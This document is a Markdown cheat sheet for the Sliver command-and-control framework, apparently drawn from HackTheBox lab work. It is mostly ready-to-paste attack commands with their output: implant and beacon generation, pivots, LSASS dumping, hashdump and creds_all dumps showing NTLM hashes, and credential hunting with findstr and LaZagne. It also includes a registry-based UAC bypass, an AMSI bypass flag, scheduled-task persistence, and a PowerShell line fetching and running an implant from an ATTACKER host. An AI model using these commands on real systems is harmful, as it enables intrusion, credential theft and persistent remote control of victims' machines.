# Sliver
## Sliver Basics
### Installation
```
apt-get update -y
apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
mkdir sliver
cd sliver
curl https://sliver.sh/install|sudo bash
```
* Assuming `/usr/local/bin/` is in your path, your sliver server should be available in the shell as `sliver-server` and the client as `sliver`.
### Prepare a delivery method
On your C2 server, run `systemctl start apache2` to start a web server. You can now copy the implants you generate into the folder `/var/www/html` and Apache will serve them. To allow any system user to put a payload their, you can run `chmod -R 777 /var/www/html`.
### Generating the implant
Implant generation happens on the C2 server with the `generate` command. Connect to it and run `help generate` to read the extensive help page and learn about all the flags. Here is a selection of the most important flags for now:
* `--mtls 192.168.122.111`: Specifies that the implant should connect to the Sliver server using a mutually authenticated TLS connection. Other options would be `--wg` for WireGuard, `--http` for HTTP(S) connections or `--dns` for DNS-based C2.
* `--os windows`: specifies that we want to run the implant on Windows (which is the default, so we could omit this one). MacOS and Linux are also supported.
* `--arch amd64`" specifies that we want a 64-bit implant (also the default, could be omitted). Use `--arch 386` for a 32-bit one.
* `--format exe`: specifies that we want an executable file (again the default). Other options are `--format shared` for dynamic libraries, `--format service` for a Windows service binary (can be used with the `psexec` command) and `shellcode` (only windows).
* `--save /var/www/html/`: specifies the directory to save the binary to. I like to use the Apache web root.
```
sliver > generate --mtls 192.168.122.111 --os windows --arch amd64 --format exe --save /var/www/html
```
### Fix Permissions
The file `/var/www/html/MEDICAL_CHANGE.exe` will not be owned by the Apache system user and has very restrictive file system permissions. To make it accessible for Apache, run `sudo chown www-data:www-data /var/www/html/MEDICAL_CHANGE.exe`.
### Start Listener
Now start the mTLS listener on the C2 server using the `mtls` command. By default, it starts the listener on port 8888. You can view your listeners with the `jobs` command:
```
sliver > mtls
[*] Starting mTLS listener ...
sliver >
[*] Successfully started job #1
sliver > jobs
ID Name Protocol Port
==== ====== ========== ======
1 mtls tcp 8888
```
### Transfer Binary to Target
### Execute The Binary
* If all is successful you will see a new session opened
```
[*] Session 971c5a23 MEDICAL_CHANGE - 192.168.122.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:36:48 CEST
```
### Using a session
You can use your session with the `use` command. Just type it, hit enter, and an interactive prompt will appear that allows to select a session. Hit enter again and your prompt changes to the implant name, which was `MEDICAL_CHANGE` in my case. The session is now active and ready to accept your commands. With `info`, you can get more information about the implant:
```
sliver > use
? Select a session or beacon: SESSION 971c5a23 MEDICAL_CHANGE 192.168.122.160:50051 DESKTOP-IPQVF9T DESKTOP-IPQVF9T\tester windows/amd64
[*] Active session MEDICAL_CHANGE (971c5a23-73e0-4418-b9c2-266484546e0d)
sliver (MEDICAL_CHANGE) > info
Session ID: 971c5a23-73e0-4418-b9c2-266484546e0d
Name: MEDICAL_CHANGE
Hostname: DESKTOP-IPQVF9T
UUID: d512a12c-6b6d-4f19-814e-1f60088e9563
Username: DESKTOP-IPQVF9T\tester
UID: S-1-5-21-2966923018-1740081829-2498838087-1001
GID: S-1-5-21-2966923018-1740081829-2498838087-513
PID: 7244
OS: windows
Version: 10 build 19044 x86_64
Arch: amd64
Active C2: mtls://192.168.122.111:8888
Remote Address: 192.168.122.160:50051
Proxy URL:
Reconnect Interval: 1m0s
```
Sliver implants supports several commands. You can get a full list with `help`. Features include file system exploration, file up- and downloads, port forwarding, taking screenshots and much more.
### Kill Session
```
sessions
sessions -k session_id
```
```
sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ======================= ================= ========== ================== =========
971c5a23 mtls 192.168.122.160:50051 DESKTOP-IPQVF9T tester windows/amd64 [ALIVE]
sliver > sessions -k 971c5a23
[!] Lost session 971c5a23 MEDICAL_CHANGE - 192.168.122.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:52:53 CEST
```
### Kill Jobs
* To kill your listener
```
[server] sliver > jobs
ID Name Protocol Port
==== ====== ========== ======
1 mtls tcp 8888
[server] sliver > jobs -k 1
[*] Killing job #1 ...
[*] Successfully killed job #1
[!] Job #1 stopped (tcp/mtls)
```
### Generating Beaconing implant
Generating a beacon implant is very similar to session implant generation. You use the `generate beacon` command. Learn all about the flags with `help generate beacon`. Aside from all the flags discussed above, relevant beacon flags are:
* `--seconds 5`: specify that the beacon should contact the C2 server every 5 seconds. You could alternatively use `--minutes`, `--hours` or `--days`.
* `--jitter 3`: specify that an additional random delay of up to 3 seconds should be added to the 5 seconds interval.
This is how I generated the beacon:
```
sliver > generate beacon --mtls 192.168.122.111 --os windows --arch amd64 --format exe --save /var/www/html --seconds 5 --jitter 3
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/STALE_PNEUMONIA.exe
```
### Great Opsec ready beacon
generate beacon --seconds 1800 --jitter 300 --os linux --arch amd64 --format exe --mtls 10.10.10.10:8080 -k 10000 -t 3600 --name main --save /opt/sliver/main
generate beacon -a amd64 -c google.com -f exe -J 300 -k 3000 --mtls 10.10.10.10:8080 --name main -o linux -j 1800 --save /opt/sliver/main -S 1800 -t 3600
### Rename Session / Beacon
```
rename --name
```
### View Beacon Tasks
```
sliver > beacons
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ============ =========== ============== ========== ================== =============== ===============
b3b9f2ee carter_one mtls devel root linux/amd64 2m15s 57m47s
```
* interact with `use`
* view tasks with `tasks`
* view output of tasks with `task fetch `
* reconfigure an implant to callback at a certain frequency
* `reconfig -i 1800 -j 5m -t 3600 -r 1800s`
### Sliver Survey
* Execute the following commands in order upon session opening
```
info Get info about session
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
whoami Get session user execution context
ps List remote processes
netstat Print network connection information
pwd Print working directory
ls List current directory
screenshot Take a screenshot
getprivs Get current privileges (Windows only)
```
* After this general survey, decide if you want/need (opsec) to migrate to a new process or not.
```
migrate Migrate into a remote process
getprivs Get current privileges (Windows only)
```
## Sliver In-Depth
### Generation of implants Quick Paste
```
# linux
generate -a amd64 --format exe --mtls 10.10.14.4:8080 --name DANTENIX01 --os linux --save /home/ubuntu/Documents/htb/dante/10.10.110.100/implants
# windows
generate -a amd64 --format exe --mtls 172.16.1.100:8443 --name DANTE-WS01 --os windows --save /home/ubuntu/Documents/htb/dante/172.16.1.13/implants
```
### Create Listener Quick Paste
```
# mtls listener
mtls -L 10.10.14.2 -l 8080
# pivot listener
pivots tcp -l 3006 --bind 172.16.1.100 -t 300
```
### Pivots Quick Paste
```
# linux
generate --tcp-pivot 172.16.1.100:3006 -a amd64 -o linux -s /home/ubuntu/Documents/htb/dante/172.16.1.100.3006.pivot
# windows
generate --tcp-pivot 172.16.1.100:3006 -a amd64 -o windows -s /home/ubuntu/Documents/htb/dante/172.16.1.100.3006.pivot
```
### Download
* Recursive Download
* **DANGER** -> If you do not set -t \ and the default timeout for command occurs then your session will die.
* If you are downloading a large amount of files ensure you set a long timeout to avoid a session being killed
```
download -r 'C:\Users\katwamba\.ssh'
[*] Wrote 2651 bytes (3 files successfully, 0 files unsuccessfully) to /home/ubuntu/Documents/htb/dante/10.10.110.100/implants/dante-dc01_download_C_Users_katwamba_ssh_1714697939.tar.gz
```
### Port Forward Quick Paste
```
portfwd add -b 60000 -r 127.0.0.1:4444
[*] Port forwarding 127.0.0.1:60000 -> 127.0.0.1:4444
```
* view current port forwards
```
portfwd
ID Session ID Bind Address Remote Address
==== ====================================== ================= =================
1 15b59b8a-6954-4230-85e3-5ab927fcedc3 127.0.0.1:4444 127.0.0.1:4444
2 15b59b8a-6954-4230-85e3-5ab927fcedc3 127.0.0.1:1900 127.0.0.1:1900
3 15b59b8a-6954-4230-85e3-5ab927fcedc3 127.0.0.1:50142 127.0.0.1:50142
```
* delete a current port forward
```
portfwd rm -i 2
```
### Process Enumeration with Command Line
Use `ps -c -f` to see full command lines of running processes. This is critical for finding credentials passed as arguments.
```bash
# Show all processes with full command line
ps -c -f
# Filter for specific process
ps -e "firefox.exe" -c -f
```
**Example credential discovery:**
```bash
ps -c -f
# Output showing credentials in command line:
# 6624 SUPPORTDESK\Chase C:\Program Files\Mozilla Firefox\firefox.exe : "C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
```
### Sliver runas Command
Run a process as a different user (requires valid credentials):
```bash
# Run sliver implant as Administrator
runas -d . -u Administrator -P 'Password123!' -n -p C:\\Windows\\System32\\spool\\drivers\\color\\sliver.exe
# Flags:
# -d Domain (use "." for local accounts)
# -u Username
# -P Password
# -n NetOnly logon (network credentials only)
# -p Path to executable
```
**Note:** `runas` may not give you a new session with the elevated user's token. For full impersonation, use `rubeus createnetonly` with `migrate`.
### Rubeus createnetonly + Migrate
For proper credential-based impersonation in Sliver:
```bash
# 1. Create a process with target user's network credentials
rubeus -t 20 -- createnetonly /program:C:\\Windows\\System32\\notepad.exe /domain:. /username:Administrator /password:'Password123!'
# Output:
# [+] Process : 'C:\Windows\System32\notepad.exe' successfully created with LOGON_TYPE = 9
# [+] ProcessID : 5852
# 2. Migrate into the new process
migrate -p 5852
# 3. New session will be created with network access as target user
```
### SharpUp - Automated Priv Esc Checks
GhostPack tool for finding privilege escalation paths.
```bash
sharpup audit
# Example output:
=== SharpUp: Running Privilege Escalation Checks ===
Registry AutoLogon Found
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
=== Registry AutoLogons ===
DefaultDomainName: .
DefaultUserName: Administrator
DefaultPassword:
=== Unattended Install Files ===
C:\Windows\Panther\Unattend.xml
```
**What it checks:**
* Modifiable services/binaries
* AlwaysInstallElevated
* Unattended install files
* Registry AutoLogon credentials
* Modifiable scheduled tasks
* Cached GPP passwords
### PowerShell Run Process as Different User
When you have credentials but need to spawn a process as that user from a Sliver shell:
```powershell
# Get into a shell first
shell -t 600
# Create credential object
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(".\Administrator", $pass)
# Download and execute (e.g., new Sliver implant)
(New-Object Net.WebClient).DownloadFile('http://ATTACKER:8000/sliver2.exe', "$env:TEMP\sliver2.exe")
Start-Process -Credential $Cred "$env:TEMP\sliver2.exe"
# New session will appear as the target user
```
### Sliver Windows Post Exploitation
* good finds
```
execute -t 120 -o cmd.exe /c "dir c:\*pass* /s"
execute -t 120 -o cmd.exe /c "dir c:\*password* /s"
execute -t 120 -o cmd.exe /c "dir c:\*login* /s"
execute -t 120 -o cmd.exe /c "dir c:\*.key /s"
execute -t 120 -o cmd.exe /c "dir c:\*.ica /s"
execute -t 120 -o cmd.exe /c "dir c:\*.pwd* /s"
execute -t 120 -o cmd.exe /c "dir c:\*.config* /s"
execute -t 120 -o cmd.exe /c "dir c:\*access* /s"
```
* passwords in the registry
```
execute -o cmd.exe /c 'reg query HKCU /f password /t REG_SZ /s'
```
### Execute-Assembly
```
execute-assembly -t 80 /home/ubuntu/Downloads/Autoruns64.exe -accepteula
```
### sa-netlocalgroup
* Coff-loader method of attaining local groups on a windows machines
* Works on Domain Controllers as well
```
sa-netlocalgroup
[*] Successfully executed sa-netlocalgroup (coff-loader)
[*] Got output:
Name: Administrators
Comment: Administrators have complete and unrestricted access to the computer/domain
--------------------------------
Name: Users
Comment: Users are prevented from making accidental or intentional system-wide changes and can run most applications
--------------------------------
Name: Guests
Comment: Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted
--------------------------------
--snip--
```
### Hashdump
* Dump hashes from sliver session
```
hashdump
[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:3317be94bdf8da53235f825815bda05a:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
```
### c2tc-domaininfo
* Enumerate domain information from a DC
```
d2tc-domaininfo
[*] Successfully executed c2tc-domaininfo (coff-loader)
[*] Got output:
--------------------------------------------------------------------
[+] DomainName:
DANTE.local
[+] DomainGuid:
{BF59501C-28DB-4087-A02D-E6CFA4C2575D}
[+] DnsForestName:
DANTE.local
[+] DcSiteName:
Default-First-Site-Name
[+] ClientSiteName:
Default-First-Site-Name
[+] DomainControllerName (PDC):
\\DANTE-DC01.DANTE.local
[+] DomainControllerAddress (PDC):
\\172.16.1.20
[+] Default Domain Password Policy:
Password history length: 24
Maximum password age (d): 180
Minimum password age (d): 0
Minimum password length: 7
[+] Account Lockout Policy:
Account lockout threshold: 0
Account lockout duration (m): 30
Account lockout observation window (m): 30
[+] NextDc DnsHostName:
dante-dc01.dante.local
```
### creds\_all
* dump all creds mimikatz style from a Windows machine, works on a domain controller
```
creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
DANTE-DC01$ DANTE b12ff47444ad1cc6996fd2d681a3f136 dec3493ce38fca341cc189fe2513dd797e19ca85
DANTE-DC01$ DANTE 8e387753e4e7e9901053030a0eafa53f 125870c6bbea628954c8e8767761cc1185622fe7
MediaAdmin$ DANTE 7c53bb427b222695060d8fd771743fb9 10757578eb3902bd612c306bee80bf44da1efaab
katwamba DANTE 14a71f9de5448d83e8c63d46355837c3 61d3cacf6ad5f4571747b302a9658f7e85c5d516
xadmin DANTE 649f65054a6672a9898cb4eb61f9684a b57e3049b5960ed60f1baa679ab0cfd4f68b0b06
--snip--
```
### Sharphound Sliver
```
sharp-hound-3 -i -s -t 120
sharp-hound-4 -i -s -t 120
[*] sharp-hound-4 output:
[*] Output saved to /tmp/sharp-hound-4_DANTE-DC01884950909.log
download 20240503015529_BloodHound.zip
[*] Wrote 10141 bytes (1 file successfully, 0 files unsuccessfully) to /home/ubuntu/Documents/htb/dante/10.10.110.100/implants/20240503015529_BloodHound.zip
rm 20240503015529_BloodHound.zip
```
### tcpdump capture with sliver
* make sure to upload a statically compiled tcpdump to match your remote targets arch
```
execute -o tcpdump -n -i any "not host 172.16.1.100" -w /dev/shm/out.pcap -G 600
```
### sharpsh — PowerShell via .NET RunspaceFactory
Execute PowerShell commands through C# RunspaceFactory. Use `-M` for AMSI bypass and `-i` to run in-process:
```
sharpsh -M -i -- "-c whoami"
[*] sharpsh output:
nt authority\system
```
### Shell Management
Detach from an interactive shell with `CTRL+]` (not CTRL+C):
```
PS C:\> ^]
Shell detached
```
List and kill shells:
```
shell ls
ID State Session PID PTY
==== ========== ======================================================= ====== =======
1 detached HUGE_MILKSHAKE (f44906cb-6562-4aef-a975-844fd782ae19) 5496 false
shell kill 1
[*] Shell 1 killed
```
### Dump LSASS with procdump
Use `procdump` to dump LSASS memory, then parse offline with pypykatz:
```
ps -e lsass.exe
Pid Ppid Executable
===== ====== ============
664 508 lsass.exe
procdump -n lsass.exe -s /tmp/lsass.dmp -t 120
[*] Process dump stored in: /tmp/lsass.dmp
```
Parse the dump on your attack machine:
```bash
pypykatz lsa minidump /tmp/lsass.dmp
```
### Stored Credentials and runas /savecred
Check for stored credentials on the target:
```
execute -o cmd.exe /c 'cmdkey /list'
Currently stored credentials:
Target: Domain:interactive=SRV01\mcharles
Type: Domain Password
User: SRV01\mcharles
```
If `Domain:interactive` is present, you can run a command as that user without knowing their cleartext password:
```
execute -o cmd.exe /c 'runas /savecred /user:SRV01\mcharles C:\Users\sadams\Desktop\sliver.exe'
[*] Session 2c6931b7 HUGE_MILKSHAKE - 10.129.21.95:49675 (SRV01) - windows/amd64
```
### UAC Bypass via computerdefaults.exe (Non-Interactive)
From a sliver session on a user in the Administrators group but at medium integrity:
```
execute -o cmd.exe /c 'reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "C:\Users\sadams\Desktop\sliver.exe" /f && start computerdefaults.exe'
```
A new elevated session will callback.
### UAC Bypass via msconfig (Interactive / RDP)
From an interactive logon (RDP) as a user in the Administrators group:
1. Launch `C:\Windows\System32\msconfig.exe` — it auto-elevates
2. Go to **Tools** tab
3. Launch **Command Prompt**
4. You are now high-integrity and can run mimikatz/other post-exploitation tools
### Sliver BOFs — Argument Separator
When passing arguments to BOFs in sliver, use `--` to separate sliver flags from BOF arguments:
```
sa-vssenum -t 60 -- -hostname=DC01
```
### Volume Shadow Copies via Sliver
```
execute -o cmd.exe /c "vssadmin CREATE SHADOW /For=C:"
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {4e29f41c-a1ee-4d6f-9f30-9fed439df3be}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
execute -o cmd.exe /c "vssadmin list shadows"
```
### lazagne — Credential Harvesting
Upload and run [lazagne](https://github.com/AlessandroZ/LaZagne) to dump all credentials from the system:
```
upload /opt/bin/lazagne.exe
execute -t 240 -o lazagne.exe all -v
```
Reference: [sliver-cheatsheet lazagne](https://github.com/Anon-Exploiter/sliver-cheatsheet?tab=readme-ov-file#lazagne)
### Port Forwarding with Bind Address
Bind to all interfaces (`0.0.0.0`) to allow other tools to connect through the tunnel:
```
portfwd add -b 0.0.0.0:4445 -r 172.16.1.10:445
[*] Port forwarding 0.0.0.0:4445 -> 172.16.1.10:445
```
**Important:** When using netexec or other multi-threaded tools through sliver tunnels, use `-t 1` to limit threads and avoid killing the tunnel:
```bash
netexec smb 127.0.0.1 -u -d -H --shares --port 4445 -t 1
```
### Scheduled Task Persistence
```
schtasks /create /tn "OneShotTask" /tr "C:\path\to\sliver.exe" /sc ONCE /st 23:59 /rl HIGHEST /f
```
### Upload and Download
```
upload /opt/bin/tool.exe
download C:\Users\target\file.txt
```
### Execute Commands
```
execute -o cmd.exe /c ''
```
### Credential Hunting from Sliver
Search for passwords in files across the file system:
```
execute -o cmd.exe /c 'findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
execute -o cmd.exe /c 'findstr /SIM /C:"pass" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
execute -o cmd.exe /c 'findstr /SIM /C:"config" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
```
List files of interest recursively:
```
execute -o cmd.exe /c 'dir /S /B *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
```
### Spawn Process as Different User (Multiple Methods)
**Method 1: runas via cmd.exe**
```
runas -d DOMAIN -u USERNAME -P 'PASSWORD' -p 'C:\path\to\sliver.exe' -n
```
**Method 2: PowerShell Start-Process**
```powershell
$username = "jbader"
$password = ConvertTo-SecureString "ILovePower333###" -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($username, $password)
Start-Process "C:\path\to\sliver.exe" -Credential $credential
```
